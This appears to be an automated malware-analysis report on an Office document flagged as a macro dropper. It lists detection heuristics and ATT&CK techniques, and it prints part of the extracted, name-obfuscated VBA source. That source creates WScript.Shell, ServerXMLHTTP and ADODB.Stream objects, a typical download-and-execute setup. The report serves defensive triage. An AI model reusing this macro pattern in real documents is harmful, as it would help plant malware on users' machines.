MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample contains VBA macros that utilize WScript.Shell and CreateObject to execute commands and potentially download additional payloads. The presence of 'WScript.Shell usage' and 'Shell() call in VBA' heuristics, along with the explicit use of CreateObject("WScript.Shell"), strongly indicates an attempt to run arbitrary code. The ClamAV detection 'Doc.Dropper.Agent-6403542-0' further supports this, suggesting the file acts as a dropper for other malware.
Heuristics 8
-
ClamAV: Doc.Dropper.Agent-6403542-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6403542-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
Dim EodzZDPL As Boolean, FxaIym As String Set nMfUcbkG = CreateObject("WScript.Shell") End Function -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Dim EodzZDPL As Boolean, FxaIym As String Set nMfUcbkG = CreateObject("WScript.Shell") End Function -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://www.w3.org/1999/02/22-rdf-syntax-ns# In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 826 bytes |
SHA-256: 8826659a0789a06b2e0ad0bf4b3d82c2add4f20075688a70f10e70f95f0e029a |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
17 of 34 identifiers look randomly generated (e.g. 'SD4TCKeu3IHqlc2') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "CdauetYt"
Private Sub FVuRKIl(ByVal pmWuLilpm As Boolean, ByVal aIqbK As Integer)
JdrgwQ
End Sub
Public Function nMfUcbkG() As Object
Dim EodzZDPL As Boolean, FxaIym As String
Set nMfUcbkG = CreateObject("WScript.Shell")
End Function
Public Function yFOARrxkL() As Object
Set yFOARrxkL = CreateObject("MSXML2.ServerXMLHTTP.6.0")
End Function
Private Sub moqIyd()
If euVWF Then
EqgCajclK 1379, False, "kEZ7ikRgqZjN"
End If
End Sub
Private Sub Ixnbt(ByVal qhzmzrgK As String)
rwKYqDFg True, 2503
End Sub
Public Function QLILYAMDT() As Object
Dim joIhfWf As Boolean
Set QLILYAMDT = CreateObject("ADODB.Stream")
End Function
Private Function ttnweZ() As Integer
scmBSvpTk 2792
lJSsRbNCDs
jTPYG 698, True
upFcL "131Q7ACPrtPZO", "SD4TCKeu3IHqlc2", 3231
ttnweZ = 5750
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.